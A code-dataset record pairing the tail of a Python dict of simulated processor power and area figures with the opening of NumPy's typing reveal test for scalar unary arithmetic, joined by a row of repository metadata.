'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.130415,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.300512,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.41324,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000679372,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000679372,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000613657,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000249548,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000549449,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00252185,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00573042,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0367697,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.33887,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0980438,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.124886,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.67089,
'Instruction Fetch Unit/Runtime Dynamic': 0.267952,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0363631,
'L2/Runtime Dynamic': 0.00744087,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49217,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.612821,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0406038,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0406037,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68391,
'Load Store Unit/Runtime Dynamic': 0.853668,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100122,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200244,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0355336,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0360296,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.145422,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0162211,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.362571,
'Memory Management Unit/Runtime Dynamic': 0.0522507,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.8255,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.129283,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0071364,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0602474,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.196667,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.79122,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0348609,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.23007,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.18129,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0964648,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.155594,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0785387,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.330598,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0825324,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.30767,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0342495,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00404617,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0425933,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0299239,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0768429,
'Execution Unit/Register Files/Runtime Dynamic': 0.0339701,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0984494,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.229242,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.22926,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000605369,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000605369,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000548496,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000223938,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000429859,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00218909,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00504606,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0287666,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.8298,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0790572,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0977043,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.13712,
'Instruction Fetch Unit/Runtime Dynamic': 0.212763,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.033966,
'L2/Runtime Dynamic': 0.00647773,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.18981,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.466498,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0308219,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0308218,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.33536,
'Load Store Unit/Runtime Dynamic': 0.649322,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0760015,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.152002,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0269732,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0274533,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.11377,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0130488,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.316214,
'Memory Management Unit/Runtime Dynamic': 0.0405021,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7198,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0900952,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00544867,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0473959,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.14294,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.28126,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.118045548428725,
'Runtime Dynamic': 6.118045548428725,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.283309,
'Runtime Dynamic': 0.085314,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.5088,
'Peak Power': 106.621,
'Runtime Dynamic': 15.5123,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.2255,
'Total Cores/Runtime Dynamic': 15.4269,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.283309,
'Total L3s/Runtime Dynamic': 0.085314,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.095186 | 124 | 0.682212 | 8,082 | 68,637 | 5.7878 | 0.067681 | 0.123479 | 0.112876 | 0.093379 | 0.938666 | 0.930222 | 0.917438 | 0.886675 | 0.862454 | 0.841738 | 0 | 0.132404 | 0.224238 | 68,637 | 914 | 125 | 75.095186 | 0.746103 | 0 | 0 | 0.642232 | 0 | 0 | 0.657143 | 0.048078 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a133c1363392ead67a9754e01c9275f4085f943 | 16,746 | py | Python | numpy/typing/tests/data/reveal/arithmetic.py | takanori-pskq/numpy | ae7f9a2cb71cccc9d49cd343e238464107397814 | [
"BSD-3-Clause"
] | 3 | 2021-02-06T06:47:30.000Z | 2021-08-11T10:05:27.000Z | numpy/typing/tests/data/reveal/arithmetic.py | RuSHi2381/numpy | 5da4a8e1835a11d5a03b715e9c0afe3bb96c883b | [
"BSD-3-Clause"
] | null | null | null | numpy/typing/tests/data/reveal/arithmetic.py | RuSHi2381/numpy | 5da4a8e1835a11d5a03b715e9c0afe3bb96c883b | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
c16 = np.complex128()
f8 = np.float64()
i8 = np.int64()
u8 = np.uint64()
c8 = np.complex64()
f4 = np.float32()
i4 = np.int32()
u4 = np.uint32()
dt = np.datetime64(0, "D")
td = np.timedelta64(0, "D")
b_ = np.bool_()
b = bool()
c = complex()
f = float()
i = int()
AR = np.array([0], dtype=np.float64)
AR.setflags(write=False)
# unary ops
reveal_type(-c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(-c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(-f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(-f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(-i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(-i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(-u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(-u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(-td) # E: numpy.timedelta64
reveal_type(-AR) # E: Union[numpy.ndarray*, numpy.generic]
reveal_type(+c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(+c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(+f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(+f4) # E: numpy.floating[numpy.typing._32Bit]
